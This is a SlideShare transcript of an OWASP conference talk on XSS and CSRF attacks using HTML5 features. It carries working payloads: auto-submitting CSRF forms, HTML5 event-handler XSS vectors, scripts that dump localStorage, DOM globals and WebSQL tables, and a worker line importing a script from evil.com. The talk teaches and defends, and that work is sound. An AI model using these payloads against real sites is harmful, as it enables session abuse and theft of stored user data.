• Share
  • Email
  • Embed
  • Like
  • Save
  • Private Content
XSS and CSRF with HTML5
 

XSS and CSRF with HTML5

on

  • 12,304 views

 

Statistics

Views

Total Views
12,304
Views on SlideShare
9,777
Embed Views
2,527

Actions

Likes
17
Downloads
0
Comments
3

57 Embeds 2,527

http://shreeraj.blogspot.com 914
http://shreeraj.blogspot.in 701
http://shreeraj.blogspot.com.br 83
https://twitter.com 71
http://shreeraj.blogspot.kr 68
http://shreeraj.blogspot.de 66
http://shreeraj.blogspot.co.uk 60
http://shreeraj.blogspot.ru 59
http://shreeraj.blogspot.fr 50
http://shreeraj.blogspot.se 41
http://shreeraj.blogspot.co.at 31
http://shreeraj.blogspot.it 31
http://shreeraj.blogspot.co.il 28
http://shreeraj.blogspot.jp 28
http://shreeraj.blogspot.ca 22
http://shreeraj.blogspot.nl 22
http://shreeraj.blogspot.sg 20
http://shreeraj.blogspot.com.au 18
http://shreeraj.blogspot.mx 17
http://shreeraj.blogspot.ch 17
http://shreeraj.blogspot.com.es 17
http://shreeraj.blogspot.ro 16
http://shreeraj.blogspot.tw 14
http://shreeraj.blogspot.hk 13
http://shreeraj.blogspot.ae 9
http://shreeraj.blogspot.com.ar 9
https://si0.twimg.com 8
http://www.shreeraj.blogspot.ru 7
http://shreeraj.blogspot.cz 7
http://shreeraj.blogspot.fi 7
http://127.0.0.1 7
http://shreeraj.blogspot.ie 7
http://www.shreeraj.blogspot.in 5
http://shreeraj.blogspot.dk 5
http://shreeraj.blogspot.co.nz 5
http://shreeraj.blogspot.be 4
http://shreeraj.blogspot.pt 4
http://shreeraj.blogspot.no 3
http://tweetedtimes.com 3
http://shreeraj.blogspot.com.tr 3
http://www.shreeraj.blogspot.com 3
http://shreeraj.blogspot.gr 3
http://twitter.com 2
https://twimg0-a.akamaihd.net 2
http://www.verious.com 2
https://abs.twimg.com 2
http://cloud.feedly.com 2
http://shreeraj.blogspot.sk 2
http://www.wzd.com 1
http://shreeraj.blogspot.hu 1
More...

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel

13 of 3 previous next Post a comment

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
  • thanks for sharing
    Are you sure you want to
    Your message goes here
    Processing…
  • Xem Phim Sex http://phimtruyen.us Va Nghe Nhac DJ http://dj8x.com .Chuc cac co nhung giay phut thoai mai nhat
    Are you sure you want to
    Your message goes here
    Processing…
  • thanks for the slides, but CSRF part is not very clear for me unfortunatelly.....any videos, or blog posts with more details? Thanks.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

    XSS and CSRF with HTML5 XSS and CSRF with HTML5 Presentation Transcript

    • XSS & CSRF with HTML5 Attack, Exploit and Defense Shreeraj Shah Blueinfy Solutions Pvt. Ltd. shreeraj.shah@blueinfy.netOWASPOWASP AppSecUSA 2012 Copyright © The OWASP Foundation Permission is granted to copy, distribute and/or modify this document under the terms of the OWASP License. The OWASP Foundation http://www.owasp.org
    • http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com Who Am I? http://www.blueinfy.com Twitter --@shreeraj Twitter @shreeraj Founder & Director  Blueinfy & iAppSecure Solutions Pvt. Ltd. Past experience  Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino Dev) Interest  Web security research Published research  Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.  Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan, AppPrint etc.  Advisories - .Net, Java servers etc.  Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc. Books (Author)  Web 2.0 Security – Defending Ajax, RIA and SOA  Hacking Web Services  Web Hacking OWASP 2
    • HTML5 VECTORS – ATTACKSURFACE OWASP 3
    • HTML5 – Attacks on the rise …Evolution of HTML5 1991 – HTML started (plain and simple) 1996 – CSS & JavaScript (Welcome to world of XSS and browser security) 2000 – XHTML1 (Growing concerns and attacks on browsers) 2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion) 2009 – HTML5 (Here we go… new surface, architecture and defense) – HTML+CSS+JS OWASP 4
    • Modern Browser Model Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage FileSystem XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS/Content-Sec Sandbox Core Policies OWASP 5
    • HTML5 Architecture & Threat Model User Interface Cross Domain Application Sandbox (Origin – Policy ) HTML/CSSSingle JavaScript InternetDOM/PageApplication XHR Target DOM WebSockets Application Native Storage, WebSQL, IndexedDB Messaging APIs Geolocation and other FileSystem, Cache - APIs APIs OWASP 6
    • CSRF WITH HTML5 OWASP 7
    • CSRF Attack Vector ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At CSRF Attack – with session Login Success – cookie set Success Web Store Database Client/Victim Application Server Browser Server Successful exploitation … •SOP bypass •Cookie Replay OWASP 8
    • SOP bypass and Cookie Replay – Basic Type GET Request IMG SRC <img src="http://host/?command"> SCRIPT SRC <script src="http://host/?command"> IFRAME SRC <iframe src="http://host/?command"> POST Request <script type="text/javascript" language="JavaScript"> document.foo.submit(); </script> OWASP 9
    • Streams – name/value pairs are gone … JSON XML JS-Script JS-Object JS-Array OWASP 10
    • CSRF injection – splitting and forcing …<html><body><FORM NAME="buy" ENCTYPE="text/plain"action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST"> <input type="hidden" name=<?xml version value="1.0"?><methodCall><methodName>stocks.buy</methodName><params><param><value><string>MSFT</string></value></param><param><value><double>26</double></value></param></params></methodCall>></FORM><script>document.buy.submit();</script></body></html> OWASP 11
    • CSRF with XHR and CORS bypass Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 12
    • XHR – Level 2 powering CSRFXHR object of HTML5 is very powerful Allows interesting features like cross origin request and binary upload/downloadxhr.responseType can be set to "text", "arraybuffer", "document“ and "blob“Also, for posting data stream - DOMString, Document, FormData, Blob, File, ArrayBuffer etc… OWASP 13
    • CORS & XHR – ingredients for CSRFBefore HTML5 – Cross Domain was not possible through XHR (SOP applicable)HTML5 – allows cross origin calls with XHR-Level 2 callsCORS – Cross Origin Resource Sharing needs to be followed (Option/Preflight calls)Adding extra HTTP header (Access-Control-Allow- Origin and few others) OWASP 14
    • CORS based HTTP HeadersRequest Origin Access-Control-Request-Method (preflight) Access-Control-Request-Headers (preflight)Response Access-Control-Allow-Origin Access-Control-Allow-Credentials Access-Control-Allow-Expose-Headers Access-Control-Allow-Max-Age (preflight) Access-Control-Allow-Allow-Methods (preflight) Access-Control-Allow-Allow-Headers (preflight) OWASP 15
    • XHR – Stealth POST/GETCSRF – powered by CORS and XHR Hence, allow stealth channel and possible silent exploitation One way CSRF with any stream since XHR allows raw stream from browser (XML, JSON, Binary as well) Two way CSRF (POST and read both – in case of allow set to *) OWASP 16
    • Exploiting the use caseCORS preflight bypass – certain Content-Type bypass preflight HTTPForcing cookie replay by “withCredentials”Internal network scanning and tunnelingInformation harvesting (internal crawling)Stealth browser shell – post XSS (Allow origin- *)Business functionality abuse (upload and binary streams) OWASP 17
    • CSRF with XHR/HTML5 Authentication User Server establishing Session Login request (HTTPS) Session cookie Web Store Database Client/Victim Application Server Browser Server OWASP 18
    • CSRF with XHR/HTML5 Browser using XHR Call Authentication JavaScript User making Server a buy over HTTP Placing an order (JSON services) Success Web Store Database Client/Victim Application Server Browser Server OWASP 19
    • CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Session is Authentication ke c nd Server tta r se a d still live – not it A ke ylo Vis t ac pa yet logged At out Web Store Database Client/Victim Application Server Browser Server Leveraging XHR Call • Content-type to avoid pre flight • “withCredentials” set to true OWASP 20
    • CSRF & HTML5 OWASP 21
    • CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP buy request Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP request generated • Silent Exploitation takes place OWASP 22
    • CSRF & HTML5 OWASP 23
    • CSRF with XHR/HTML5 Browser is having Form (multi-part) Business Authentication Server layer function of uploading Uploading bulk orders Success Web Store Database Client/Victim Application Server Browser Server OWASP 24
    • CSRF/Upload - POC OWASP 25
    • CSRF with XHR/HTML5 ge Attacker’s a RF r’ sp s CS Site Authentication ke c nd Server tta r se a d it A ke ylo Vis t ac pa At XHR initiates HTTP multi-part - Upload Success – cookie replayed Web Store Database Client/Victim Application Server Browser Server Hence, • Without victim’s consent or notice Got it • Stealth HTTP Upload takes place • Silent Exploitation… OWASP 26
    • CSRF/Upload OWASP 27
    • Internal Scan – not scan but crawl as well … Attacker’s Site Internet Internet CSRF Payload And stealth channel Client/Victim Intranet Intranet Browser Internal Web Internal HR Internal Web/App Mail Application Server OWASP 28
    • Internal Scan for CORS OWASP 29
    • Scan and DefendScan and look for Content-Type checking on server side CORS policy scan Form and Upload with tokens or notDefense and Countermeasures Secure libraries for streaming HTML5/Web 2.0 content CSRF protections Stronger CORS implementation OWASP 30
    • XSS WITH HTML5 OWASP 31
    • XSS with HTML5 (tags, attributes and events) Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 32
    • HTML5 – Tags/Attributes/EventsTags – media (audio/video), canvas (getImageData), menu, embed, buttons/commands, Form control (keys)Attributes – form, submit, autofocus, sandbox, manifest, rel etc.Events/Objects – Navigation (_self), Editable content, Drag-Drop APIs, pushState (History) etc. OWASP 33
    • XSS variantsMedia tagsExamples <video><source onerror="javascript:alert(1)“> <video onerror="javascript:alert(1)"><source> OWASP 34
    • XSS variantsExploiting autofocus <input autofocus onfocus=alert(1)> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> OWASP 35
    • XSS variantsForm & Button etc. <form id="test" /><button form="test" formaction="javascript:alert(1)">test <form><button formaction="javascript:alert(1)">testEtc … and more … Nice HTML5 XSS cheat sheet (http://html5sec.org/) OWASP 36
    • Scan and DefendScan and look for Reflected or Persistent XSS spots with HTML5 tagsDefense and Countermeasures Have it added on your blacklist Standard XSS protections by encoding OWASP 37
    • CSP in Action – HTML5 defense …Content Security Policy – Defending browser against possible post attack scenarios Based on Origin (SOP the key) Allows whitelisting mechanism for what “to do” and “not to do” It is possible to send back notification to application when violation takes place Implementation by extra HTTP headers [Brower to browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)] OWASP 38
    • Blocking ScriptsContent-Security-Policy: script-src self‘ Only allowing script from the selfOther mechanism unsafe-inline - blocking inline unsafe-eval‘ – blocking eval type callsPost XSS defense can be crafted OWASP 39
    • Controlling Browserconnect-src – Controlling WebSocket, XHR etc.frame-src – Source of the frame (ClickJacking)object-src – Flash, Silverlight etc.media-src – controlling audio and videoimg/style – image and style sourcesdefault-src https:; - locking over SSL only OWASP 40
    • Example Persistent XSS injectedHTTP/1.1 200 OKDate: Wed, 12 Sep 2012 14:40:31 GMTServer: Microsoft-IIS/6.0X-Powered-By: ASP.NETX-WebKit-CSP: script-src selfX-AspNet-Version: 2.0.50727Cache-Control: privateContent-Type: text/html; charset=utf-8Content-Length: 6146 OWASP 41
    • Storage extraction with XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 42
    • Web Storage ExtractionBrowser has one place to store data – Cookie (limited and replayed)HTML5 – Storage API provided (Local and Session)Can hold global scoped variableshttp://www.w3.org/TR/webstorage/ OWASP 43
    • Web Storage ExtractionIt is possible to steal them through XSS or via JavaScriptSession hijacking – HttpOnly of no usegetItem and setItem callsXSS the box and scan through storage OWASP 44
    • Blind storage enumerationif(localStorage.length){ console.log(localStorage.length) for(i in localStorage){ console.log(i) console.log(localStorage.getItem(i)); }}Above code allows all storage variable extraction OWASP 45
    • File System StorageHTML5 provides virtual file system with filesystem APIs window.requestFileSystem = window.requestFileSystem || window.webkitRequestFileSystem;It becomes a full blown local system for application in sandboxIt empowers application OWASP 46
    • File System StorageIt provides temporary or permanent file system function init() { window.requestFileSystem(window.TEMPORARY, 1024*1024, function(filesystem) { filesys = filesystem; }, catcherror); } App can have full filesystem in place now. OWASP 47
    • Sensitive information filesystemAssuming app is creating profile on local system OWASP 48
    • Extraction through XSSOnce have an entry point – game over! OWASP 49
    • Single DOM/One Page App - XSSApplications run with “rich” DOMJavaScript sets several variables and parameters while loading – GLOBALSIt has sensitive information and what if they are GLOBAL and remains during the life of applicationIt can be retrieved with XSSHTTP request and response are going through JavaScripts (XHR) – what about those vars? OWASP 50
    • Blind Enumerationfor(i in window){ obj=window[i]; try{ if(typeof(obj)=="string"){ console.log(i); console.log(obj.toString()); } }catch(ex){}} OWASP 51
    • Global Sensitive Information Extraction from DOMHTML5 apps running on Single DOMHaving several key global variables, objects and array var arrayGlobals = [my@email.com,"12141hewvsdr9321343423mjfdvint","t est.com"];Post DOM based exploitation possible and harvesting all these values. OWASP 52
    • Global Sensitive Information Extraction from DOMfor(i in window){ obj=window[i]; if(obj!=null||obj!=undefined) var type = typeof(obj); if(type=="object"||type=="string") { console.log("Name:"+i) try{ my=JSON.stringify(obj); console.log(my) }catch(ex){} }} OWASP 53
    • Scan and DefendScan and look for Scanning storageDefense and Countermeasures Do not store sensitive information on localStorage and Globals XSS protection OWASP 54
    • SQLi & Blind Enumeration through XSS Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 55
    • SQL InjectionWebSQL is part of HTML 5 specification, it provides SQL database to the browser itself.Allows one time data loading and offline browsing capabilities.Causes security concern and potential injection points.Methods and calls are possible OWASP 56
    • SQL InjectionThrough JavaScript one can harvest entire local database.Example OWASP 57
    • Blind WebSQL Enumerationvar dbo;var table;var usertable;for(i in window){ obj = window[i]; try{ if(obj.constructor.name=="Database"){ dbo = obj; obj.transaction(function(tx){ tx.executeSql(SELECT name FROM sqlite_master WHERE type=table, [],function(tx,results){ table=results; },null); }); } }catch(ex){}}if(table.rows.length>1) usertable=table.rows.item(1).name; OWASP 58
    • Blind WebSQL EnumerationWe will run through all objects and get object where constructor is “Database”We will make Select query directly to sqlite_master databaseWe will grab 1st table leaving webkit table on 0th entry OWASP 59
    • Blind WebSQL Enumeration OWASP 60
    • Web Messaging and Worker Injection Mobile HTML5 + CSS Silverlight FlashAPI (Media, Geo etc.) & Messaging Plug-In Presentation JavaScript DOM/Events Parser/Threads Process & Logic WebSQL Cache Storage XHR 1 & 2 WebSocket Plug-in Sockets Browser Native Network Services Network & Access SOP/CORS Sandbox Core Policies OWASP 61
    • Web Messaging HTML5 is having new interframe communication system called Web Messaging. By postMessage() call parent frame/domain can call with the iframe Iframe can be loaded on cross domain. Hence, create issues – data/information validation & data leakage by cross posting possible worker.webkitPostMessage – faster transferable objects OWASP 62
    • Web Messaging - ScenarioIf postMessage() is set to * so page can be loaded in iframe and messaging can be hijackedAlso, origin is not set to fixed then again frame listen from any domian – again an issueStream coming needs to be checked before innerHTML or eval()Iframe or Web Worker can glue two streams – same domain or cross domain OWASP 63
    • Origin check OWASP 64
    • Web Worker – Hacks!Web Workers allows threading into HTML pages using JavaScriptNo need to use JavaScript calls like setTimeout(), setInterval(), XMLHttpRequest, and event handlersTotally Async and well supported [initialize] var worker = new Worker(task.js); [Messaging] worker.postMessage(); OWASP 65
    • Web Worker – Hacks! Web Page Current DOM Web Worker XHR, Location, Navigator etc. JavaScript Runtime Browser Platform Background Thread on same Scope and Object – No DOM Access page - messaging Regex, Array, JSON etc… OWASP 66
    • Web Worker – Hacks!Security issues It is not allowing to load cross domain worker scripts. (http:, https:,javascript:,data : -No) It has some typical issues  It allows the use of XHR. Hence, in-domain and CORS requests possible  It can cause DoS – if user get stream to run JavaScript in worker thread. Don’t have access to parent DOM though  Message validation needed – else DOM based XSS OWASP 67
    • Web Worker – Hacks! Exmaple<html><button onclick="Read()">Read Last Message</button><button onclick="stop()">Stop</button><output id="result"></output><script> function Read() { worker.postMessage({cmd: read, msg: last}); } function stop() { worker.postMessage({cmd: stop, msg: stop it}); alert("Worker stopped"); } var worker = new Worker(message.js); worker.addEventListener(message, function(e) { document.getElementById(result).innerHTML = e.data; }, false);</script></html> OWASP 68
    • Web Workers – Hacks!Possible to cause XSS Running script Passing hidden payloadAlso, web workers can help in embedding silent running js file and can be controlled.Can be a tool for payload delivery and control within browser frameworkimportScripts("http://evil.com/payload.js") – worker can run cross domain script OWASP 69
    • Scan and DefendScan and look for JavaScript scanning Messaging and Worker implementation DOM calls Use of eval(), document.* calls etc.Defense and Countermeasures Same origin listening is a must for messaging event Secure JavaScript coding OWASP 70
    • APIs …HTML5 few other APIs are interesting from security standpoint File APIs – allows local file access and can mixed with ClickJacking and other attacks to gain client files. Drag-Drop APIs – exploiting self XSS and few other tricks, hijacking cookies …  Lot more to explore and defend… OWASP 71
    • Resources/Referenceshttp://www.html5rocks.com/en/ (Solid stuff)https://www.owasp.org/index.php/HTML5_Security _Cheat_Sheet (OWASP stuff)http://html5sec.org/ (Quick Cheat sheet)http://html5security.org/ (Good resources)http://blog.kotowicz.net/ (Interesting work) OWASP 72
    • http://shreeraj.blogspot.com http://shreeraj.blogspot.com shreeraj@blueinfy.com shreeraj@blueinfy.com http://www.blueinfy.com http://www.blueinfy.comCONCLUSION AND QUESTIONS OWASP 73